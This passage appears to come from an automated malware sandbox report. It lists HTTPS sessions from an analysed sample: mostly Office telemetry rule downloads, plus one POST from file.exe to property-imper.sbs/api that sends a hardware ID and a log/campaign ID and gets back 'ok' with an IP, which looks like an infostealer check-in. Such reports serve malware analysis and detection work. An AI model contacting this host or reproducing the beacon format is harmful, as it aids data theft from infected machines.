                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1800&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2845&recv_bytes=20863&delivery_rate=1529596&cwnd=165&unsent_bytes=0&cid=6251b33a0318937c&ts=880&x=0"
                                                                                                                                                                                              2024-11-24 12:39:15 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                              Data Ascii: eok 8.46.123.75
                                                                                                                                                                                              2024-11-24 12:39:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              7192.168.2.64971313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:14 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:15 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 3788
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                              ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                              x-ms-request-id: 3b133675-d01e-002b-536c-3d25fb000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123915Z-15b8b599d88qw29phC1TEB5zag00000004a000000000g6eu
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:15 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              8192.168.2.64971513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:14 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:15 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 2160
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                              x-ms-request-id: 7268c357-001e-0066-5863-3b561e000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123915Z-178bfbc474bv7whqhC1NYC1fg400000005wg00000000ahmb
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:15 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              9192.168.2.64971613.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:14 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:15 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:15 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 2980
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                              x-ms-request-id: d279acb6-501e-0029-6110-3dd0b8000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123915Z-178bfbc474bfw4gbhC1NYCunf400000005wg00000000bsb9
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:15 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              10192.168.2.64971413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:14 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:15 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 450
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                              ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                              x-ms-request-id: 3ae325a6-f01e-001f-6051-3c5dc8000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123915Z-15b8b599d882zv28hC1TEBdchn000000048g00000000cu7n
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:15 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              11192.168.2.64971713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:14 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:15 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 408
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                              x-ms-request-id: b169a0d5-c01e-00a2-4e03-3e2327000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123915Z-178bfbc474btrnf9hC1NYCb80g000000063g000000008030
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:15 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              12192.168.2.64971913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:16 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:17 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                              x-ms-request-id: 51fbd25c-e01e-0020-5e4d-3cde90000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123917Z-15b8b599d88s6mj9hC1TEBur3000000004c0000000000xau
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:17 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              13192.168.2.649724104.21.33.1164435044C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:16 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=OMB8UMN2KJMOZINR
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 1214
                                                                                                                                                                                              Host: property-imper.sbs
                                                                                                                                                                                              2024-11-24 12:39:16 UTC1214OUTData Raw: 2d 2d 4f 4d 42 38 55 4d 4e 32 4b 4a 4d 4f 5a 49 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 46 41 41 38 34 45 46 37 30 36 45 31 35 45 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4f 4d 42 38 55 4d 4e 32 4b 4a 4d 4f 5a 49 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 4d 42 38 55 4d 4e 32 4b 4a 4d 4f 5a 49 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                                              Data Ascii: --OMB8UMN2KJMOZINRContent-Disposition: form-data; name="hwid"0DFAA84EF706E15ED7CBBD6DF28D3732--OMB8UMN2KJMOZINRContent-Disposition: form-data; name="pid"1--OMB8UMN2KJMOZINRContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                                              2024-11-24 12:39:17 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:17 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=5fs4eme7dchd48n1fas8l14sa9; expires=Thu, 20-Mar-2025 06:25:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o8s3zQuhNADoCeB6AgfAn%2BJhVfKpSwBLnmc8jSPkmNIoTlUuYCjlvpGCFIFj4v%2Byk%2FNr2mfgHVIqv3PJzJv7vhZGJ9KjUx3kkwNdGX0nO1%2FGOOuSUH7L6t52y5Dcw70TWq4tS%2B4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e7975fc6fc62363-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1819&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2131&delivery_rate=1617728&cwnd=252&unsent_bytes=0&cid=4f458661363636fd&ts=704&x=0"
                                                                                                                                                                                              2024-11-24 12:39:17 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                              Data Ascii: eok 8.46.123.75
                                                                                                                                                                                              2024-11-24 12:39:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              14192.168.2.64972013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:17 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:17 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9964B277"
                                                                                                                                                                                              x-ms-request-id: 657d02d2-201e-0033-2f57-3cb167000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123917Z-178bfbc474bvjk8shC1NYC83ns00000005s0000000009zsf
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:17 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              15192.168.2.64972213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:17 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:17 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 632
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                              x-ms-request-id: 79309935-e01e-0020-7c3b-3dde90000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123917Z-15b8b599d889fz52hC1TEB59as00000004ag00000000er35
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:17 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
